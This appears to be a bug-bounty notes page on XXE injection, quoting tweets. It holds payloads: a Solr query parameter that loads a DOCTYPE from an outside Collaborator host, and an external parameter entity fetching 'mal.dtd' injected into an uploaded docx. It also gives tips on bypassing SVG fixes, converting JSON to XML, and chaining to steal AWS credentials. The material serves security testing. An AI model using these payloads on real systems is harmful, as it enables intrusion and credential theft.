# XXE

* [see an apache solr GET/POST to /select ? Set the 'q' parameter to the following for an XXE injection: /select?q={!xmlparser v='\<!DOCTYPE a SYSTEM "http://collab.burp.net">\<a>\</a>'} - https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html… #BugBounty](https://twitter.com/huntmost/status/1195507306919804928)
* [#bugbountytip Company fixed an XXE by blocking arbitrary URL(s) to grab an SVG? Try & bypass it by embedding the SVG using the Data URI protocol handler \[data:image/svg+xml;base64,XXE\_PAYLOAD\], most of the time it would work! #BugBounty #TogetherWeHitHarder #infosec #infosecurity](https://twitter.com/prateek_0490/status/1046077319801184259)
* <https://twitter.com/11xuxx/status/1250764273623629826>
* [XXE by injecting METADATA in Image bytes --> Blind SSRF via local dtd --> grabbed AWS EC2 credentials blindly --> Powned #bugbountytips #bugbountytip](https://twitter.com/HusseiN98D/status/1257825228341874689)
* [jobs.targ.com site fills in personal info by uploading cv & parsing. Accepted docx, pdf, etc. 1. Unzip docx & edit word/document.xml 3. Add \<!DOCTYPE foo \[\<!ENTITY % xxe SYSTEM "http://burp.collab.net/mal.dtd"> %xxe;\]> 3. Upload 4. Profit! #BugBounty](https://twitter.com/huntmost/status/1180649484759572480)
* [#BugBountyTip time: when you see a POST request made with JSON, convert this to XML and test for XXE. You can use "Content-type converter" extension on@Burp\_Suite to do achieve this!](https://twitter.com/HusseiN98D/status/1219750207287676933)

![https://twitter.com/Kei0x/status/1172267556226445313](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MMsovUDUgTb9VVW5xUZ%2F-MMtq130yvZdlpa7onJE%2Fimage.png?alt=media\&token=cb482753-fd74-430c-84f2-509472bf2fda)

* [XXE](https://twitter.com/11xuxx/status/1250764273623629826?s=20)

  1. [change password func -> JSON](https://twitter.com/11xuxx/status/1250764273623629826?s=20)
  2. [converted to XML -> 200 OK](https://twitter.com/11xuxx/status/1250764273623629826?s=20)
  3. [created dtd file on my ec2 and started webserver on port 80](https://twitter.com/11xuxx/status/1250764273623629826?s=20)
  4. [crafted a XXE payload!](https://twitter.com/11xuxx/status/1250764273623629826?s=20)
  5. [bounty!](https://twitter.com/11xuxx/status/1250764273623629826?s=20)

  [Always convert POST/PUT/PATCH body to xml and resend req, don't forget to change the content-type.](https://twitter.com/11xuxx/status/1250764273623629826?s=20)